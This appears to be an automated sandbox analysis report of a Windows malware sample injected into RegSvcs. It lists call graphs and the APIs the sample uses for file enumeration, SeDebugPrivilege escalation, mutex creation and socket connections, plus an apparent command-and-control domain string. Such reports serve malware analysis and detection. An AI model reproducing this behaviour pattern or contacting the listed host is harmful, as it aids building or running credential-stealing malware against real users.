9914->9909 9246 40ecde 9247 412093 20 API calls 9246->9247 9248 40ecfd 9247->9248 9249 412093 20 API calls 9248->9249 9250 40ed0d 9249->9250 9254 40e8df 9255 412093 20 API calls 9254->9255 9256 40e8f8 9255->9256 9257 412093 20 API calls 9256->9257 9258 40e908 9257->9258 9265 404b22 9258->9265 9260 40e91c 9261 40e936 9260->9261 9264 40e93d 9260->9264 9272 40e944 9260->9272 9263 402bab 2 API calls 9261->9263 9263->9264 9266 402b7c 2 API calls 9265->9266 9267 404b33 9266->9267 9268 404b66 9267->9268 9281 4049b3 9267->9281 9268->9260 9271 402bab 2 API calls 9271->9268 9273 4056bf 2 API calls 9272->9273 9274 40e952 9273->9274 9275 4057df 13 API calls 9274->9275 9280 40e976 9274->9280 9276 40e966 9275->9276 9277 413aca 4 API calls 9276->9277 9278 40e970 9277->9278 9279 405695 2 API calls 9278->9279 9279->9280 9280->9261 9282 4031e5 4 API calls 9281->9282 9283 4049c6 9282->9283 9283->9268 9283->9271 9284 4139de 9293 413855 9284->9293 9286 4139f1 9287 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9286->9287 9289 4139f7 9287->9289 9288 413866 58 API calls 9290 413a2d 9288->9290 9289->9288 9291 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9290->9291 9292 413a34 9291->9292 9294 4031e5 4 API calls 9293->9294 9295 413864 9294->9295 9295->9295 9920 4116e7 9921 4117ba 9920->9921 9922 405b6f 6 API calls 9921->9922 9927 4117f1 9921->9927 9923 4117d0 9922->9923 9924 404cbf 8 API calls 9923->9924 9923->9927 9925 4117eb 9924->9925 9926 402bab 2 API calls 9925->9926 9926->9927 9315 4094e7 9316 404b22 6 API calls 9315->9316 9317 4094fe 9316->9317 9318 409554 9317->9318 9319 405b6f 6 API calls 9317->9319 9320 409514 9319->9320 9321 404b22 6 API calls 9320->9321 9327 40954d 9320->9327 9323 40952d 9321->9323 9322 402bab 2 API calls 9322->9318 9324 409408 15 API calls 9323->9324 9329 409544 9323->9329 9326 40953e 9324->9326 9325 402bab 2 API calls 9325->9327 9328 402bab 2 API calls 9326->9328 9327->9322 9328->9329 9329->9325 9338 4058ea 9339 4031e5 4 API calls 9338->9339 9340 4058fd StrStrA 9339->9340 9972 40d4ea 9973 404bee 6 API calls 9972->9973 9974 40d500 9973->9974 9975 40d5a0 9974->9975 9976 404bee 6 API calls 9974->9976 9977 40d529 9976->9977 9978 404bee 6 API calls 9977->9978 9979 40d537 9978->9979 9980 404bee 6 API calls 9979->9980 9981 40d546 9980->9981 9981->9975 9982 405872 4 API calls 9981->9982 9983 40d56d 9982->9983 9984 405872 4 API calls 9983->9984 9985 40d57c 9984->9985 9986 405872 4 API calls 9985->9986 9987 40d58e 9986->9987 9988 405872 4 API calls 9987->9988 9988->9975 9989 40a3ea 9990 40374e 6 API calls 9989->9990 9991 40a403 9990->9991 9992 40a419 9991->9992 9993 4059d8 4 API calls 9991->9993 9994 40a411 9993->9994 9995 402bab 2 API calls 9994->9995 9995->9992 9378 404df3 WSAStartup 9382 4091f6 9383 404b22 6 API calls 9382->9383 9384 40920b 9383->9384 9385 409222 9384->9385 9386 409408 15 API calls 9384->9386 9387 40921c 9386->9387 9388 402bab 2 API calls 9387->9388 9388->9385 10022 4117fe 10023 404c4e 6 API calls 10022->10023 10024 411888 10023->10024 10025 411925 10024->10025 10026 404c4e 6 API calls 10024->10026 10027 4118ab 10026->10027 10027->10025 10041 4119b3 10027->10041 10029 4118c5 10030 4119b3 4 API calls 10029->10030 10031 4118d0 10030->10031 10031->10025 10032 4056bf 2 API calls 10031->10032 10033 4118fd 10032->10033 10034 405872 4 API calls 10033->10034 10035 41190a 10034->10035 10036 405872 4 API calls 10035->10036 10037 411915 10036->10037 10038 413aca 4 API calls 10037->10038 10039 41191f 10038->10039 10040 405695 2 API calls 10039->10040 10040->10025 10042 4119c6 10041->10042 10044 4119bf 10041->10044 10043 4031e5 4 API calls 10042->10043 10043->10044 10044->10029 9392 40e880 9393 41219c 14 API calls 9392->9393 9394 40e88e 9393->9394 9395 41219c 14 API calls 9394->9395 9396 40e89c 9395->9396 10108 40e48a 10109 404bee 6 API calls 10108->10109 10110 40e4d0 10109->10110 10111 40e4f4 10110->10111 10112 405872 4 API calls 10110->10112 10112->10111 9493 410390 9494 404b22 6 API calls 9493->9494 9495 4103a5 9494->9495 9496 410409 9495->9496 9497 405b6f 6 API calls 9495->9497 9499 4103ba 9497->9499 9498 402bab 2 API calls 9498->9496 9501 410402 9499->9501 9502 403d74 19 API calls 9499->9502 9505 4103fb 9499->9505 9500 402bab 2 API calls 9500->9501 9501->9498 9503 4103ee 9502->9503 9504 402bab 2 API calls 9503->9504 9503->9505 9504->9505 9505->9500 10123 40ed96 10124 4040bb 12 API calls 10123->10124 10138 40edb0 10124->10138 10125 40ef90 10126 40ef87 10127 403f9e 5 API calls 10126->10127 10127->10125 10128 405ae9 6 API calls 10128->10138 10129 412269 6 API calls 10129->10138 10130 40ef61 10131 40ef6e 10130->10131 10132 402bab 2 API calls 10130->10132 10133 40ef7c 10131->10133 10134 402bab 2 API calls 10131->10134 10132->10131 10133->10126 10136 402bab 2 API calls 10133->10136 10134->10133 10135 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10135->10138 10136->10126 10137 402bab GetProcessHeap HeapFree 10137->10138 10138->10125 10138->10126 10138->10128 10138->10129 10138->10130 10138->10135 10138->10137 10139 40ef98 10140 404c4e 6 API calls 10139->10140 10141 40efb6 10140->10141 10153 40f02a 10141->10153 10154 40f054 10141->10154 10144 404bee 6 API calls 10145 40efda 10144->10145 10146 404bee 6 API calls 10145->10146 10147 40efe9 10146->10147 10148 405872 4 API calls 10147->10148 10147->10153 10149 40f008 10148->10149 10150 405872 4 API calls 10149->10150 10151 40f01a 10150->10151 10152 405872 4 API calls 10151->10152 10152->10153 10155 40f064 10154->10155 10156 402b7c 2 API calls 10155->10156 10158 40f072 10156->10158 10157 40efca 10157->10144 10158->10157 10160 405ecd 10158->10160 10161 4059b8 4 API calls 10160->10161 10162 405edf 10161->10162 10162->10158 9512 410c98 9513 41219c 14 API calls 9512->9513 9514 410ca8 9513->9514 9515 41219c 14 API calls 9514->9515 9516 410cb5 9515->9516 9517 412093 20 API calls 9516->9517 9518 410cc9 9517->9518 10232 41249c 10233 4056bf 2 API calls 10232->10233 10234 4124aa 10233->10234 10235 4057df 13 API calls 10234->10235 10240 4124ce 10234->10240 10236 4124be 10235->10236 10237 413aca 4 API calls 10236->10237 10238 4124c8 10237->10238 10239 405695 2 API calls 10238->10239 10239->10240 9522 40f49e 9523 40f4b6 13 API calls 9522->9523 9524 40f4a8 9523->9524 9525 40929e 9526 413b28 6 API calls 9525->9526 9527 4092a4 9526->9527 9528 405b6f 6 API calls 9527->9528 9529 4092af 9528->9529 9530 4092c5 9529->9530 9531 409408 15 API calls 9529->9531 9532 4092bf 9531->9532 9533 402bab 2 API calls 9532->9533 9533->9530 10259 407fa4 10260 407fb7 10259->10260 10261 402b7c 2 API calls 10260->10261 10263 407fee 10260->10263 10262 40800d 10261->10262 10262->10263 10264 4037be 4 API calls 10262->10264 10265 40803c 10264->10265 10266 402bab 2 API calls 10265->10266 10266->10263 9570 4090aa 9571 404b22 6 API calls 9570->9571 9572 4090c1 9571->9572 9573 4090d8 9572->9573 9574 409408 15 API calls 9572->9574 9575 404b22 6 API calls 9573->9575 9576 4090d2 9574->9576 9577 4090eb 9575->9577 9578 402bab 2 API calls 9576->9578 9579 408c4d 15 API calls 9577->9579 9582 409104 9577->9582 9578->9573 9580 4090fe 9579->9580 9581 402bab 2 API calls 9580->9581 9581->9582 9589 409cae 9604 404b79 9589->9604 9591 409cc5 9592 409d27 9591->9592 9594 405b6f 6 API calls 9591->9594 9595 409d2f 9591->9595 9593 402bab 2 API calls 9592->9593 9593->9595 9596 409cec 9594->9596 9596->9592 9597 404b79 6 API calls 9596->9597 9598 409d05 9597->9598 9599 409d1e 9598->9599 9600 408c4d 15 API calls 9598->9600 9601 402bab 2 API calls 9599->9601 9602 409d18 9600->9602 9601->9592 9603 402bab 2 API calls 9602->9603 9603->9599 9605 404b22 6 API calls 9604->9605 9606 404b8a 9605->9606 9606->9591 10326 411fb3 10327 405b6f 6 API calls 10326->10327 10328 412013 10327->10328 10331 412075 10328->10331 10333 41206a 10328->10333 10345 411a8d 10328->10345 10330 402bab 2 API calls 10330->10331 10333->10330 10334 4056bf 2 API calls 10335 41203d 10334->10335 10336 405872 4 API calls 10335->10336 10337 41204a 10336->10337 10338 413aca 4 API calls 10337->10338 10339 412054 10338->10339 10340 405695 2 API calls 10339->10340 10341 41205a 10340->10341 10342 413a58 13 API calls 10341->10342 10343 412064 10342->10343 10344 402bab 2 API calls 10343->10344 10344->10333 10346 402b7c 2 API calls 10345->10346 10347 411aa3 10346->10347 10355 411f05 10347->10355 10368 404ada 10347->10368 10350 404ada 4 API calls 10351 411cad 10350->10351 10352 411f0c 10351->10352 10353 411cc0 10351->10353 10354 402bab 2 API calls 10352->10354 10371 405eb6 10353->10371 10354->10355 10355->10333 10355->10334 10357 411d3c 10358 4031e5 4 API calls 10357->10358 10366 411d7b 10358->10366 10359 411ea6 10360 4031e5 4 API calls 10359->10360 10361 411eb5 10360->10361 10362 4031e5 4 API calls 10361->10362 10363 411ed6 10362->10363 10364 405eb6 4 API calls 10363->10364 10364->10355 10365 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10365->10366 10366->10359 10366->10365 10367 405eb6 4 API calls 10366->10367 10367->10366 10369 4031e5 4 API calls 10368->10369 10370 404afd 10369->10370 10370->10350 10372 405998 4 API calls 10371->10372 10373 405ec8 10372->10373 10373->10357 9636 40f6b8 9637 41219c 14 API calls 9636->9637 9638 40f6c7 9637->9638 9639 41219c 14 API calls 9638->9639 9640 40f6d5 9639->9640 9641 41219c 14 API calls 9640->9641 9642 40f6df 9641->9642 9661 40d6bd 9662 4056bf 2 API calls 9661->9662 9663 40d6c9 9662->9663 9674 404cbf 9663->9674 9666 404cbf 8 API calls 9667 40d6f4 9666->9667 9668 404cbf 8 API calls 9667->9668 9669 40d702 9668->9669 9670 413aca 4 API calls 9669->9670 9671 40d711 9670->9671 9672 405695 2 API calls 9671->9672 9673 40d71f 9672->9673 9675 402b7c 2 API calls 9674->9675 9676 404ccd 9675->9676 9677 404ddc 9676->9677 9678 404b8f 5 API calls 9676->9678 9677->9666 9679 404ce4 9678->9679 9680 404dd4 9679->9680 9682 402b7c 2 API calls 9679->9682 9681 402bab 2 API calls 9680->9681 9681->9677 9683 404d04 9682->9683 9684 404dcc 9683->9684 9686 404dc6 9683->9686 9687 402b7c 2 API calls 9683->9687 9689 404b8f 5 API calls 9683->9689 9690 402bab GetProcessHeap HeapFree 9683->9690 9691 404a39 5 API calls 9683->9691 9692 405b6f 6 API calls 9683->9692 9693 404cbf 8 API calls 9683->9693 9685 404a39 5 API calls 9684->9685 9685->9680 9688 402bab 2 API calls 9686->9688 9687->9683 9688->9684 9689->9683 9690->9683 9691->9683 9692->9683 9693->9683 9694 40f0bf 9695 4056bf 2 API calls 9694->9695 9696 40f0c9 9695->9696 9697 40f115 9696->9697 9699 404cbf 8 API calls 9696->9699 9698 41219c 14 API calls 9697->9698 9700 40f128 9698->9700 9701 40f0ed 9699->9701 9702 404cbf 8 API calls 9701->9702 9703 40f0fb 9702->9703 9704 413aca 4 API calls 9703->9704 9705 40f10a 9704->9705 9706 405695 2 API calls 9705->9706 9706->9697

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 155 403f97-403f9d 152->155 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 168 403e12-403e22 call 405d24 167->168 169 403de4-403df9 call 405eff 167->169 189 403e30-403e4c call 405b6f 168->189 190 403e24-403e2e 168->190 169->166 186 403dfb-403e10 call 405eff 169->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->168 189->166 204 403e4e-403e6f call 403d74 call 402bab 189->204 190->166 190->189 193->162 205 403f8d 196->205 197->159 202 403f75-403f85 call 402bab call 403bef 199->202 203 403f35-403f36 call 40fa23 199->203 202->155 209 403f39-403f40 call 402bab 203->209 204->166 217 403f63-403f73 call 402bab call 403bef 204->217 205->160 209->181 217->155
                                      APIs
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID: %s\%s$%s\*$Program Files$Windows
                                      • API String ID: 1690352074-2009209621
                                      • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                      • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 3615134276-2896544425
                                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                      APIs
                                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv
                                      • String ID:
                                      • API String ID: 1507349165-0
                                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 232 406201-406203 229->232 233 406208-406228 call 4060ac call 4031e5 229->233 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 232->235 233->230 233->232 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 265 406320-406326 call 402bab 261->265 266 406327 261->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                      • _wmemset.LIBCMT ref: 00406244
                                      • _wmemset.LIBCMT ref: 00406261
                                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _wmemset$ErrorInformationLastToken
                                      • String ID: IDA$IDA
                                      • API String ID: 487585393-2020647798
                                      • Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                      • Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 554 404ec7-404ec9 542->554 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 548 404ec0-404ec6 call 402bab 545->548 549 404ecb 545->549 546->545 548->554 553 404ecd-404ece 549->553 553->539 554->553
                                      APIs
                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: freeaddrinfogetaddrinfosocket
                                      • String ID:
                                      • API String ID: 2479546573-0
                                      • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                      • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AllocCreateReadVirtual
                                      • String ID: .tmp
                                      • API String ID: 3585551309-2986845003
                                      • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                      • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                      APIs
                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                      • GetLastError.KERNEL32 ref: 0041399E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Error$CreateLastModeMutex
                                      • String ID:
                                      • API String ID: 3448925889-0
                                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 3672724799-0
                                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                        • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$CreateFreeProcessThread_wmemset
                                      • String ID: ckav.ru
                                      • API String ID: 2915393847-2696028687
                                      • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                      • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • _wmemset.LIBCMT ref: 0040634F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess_wmemset
                                      • String ID: CA
                                      • API String ID: 2773065342-1052703068
                                      • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                      • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                      APIs
                                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
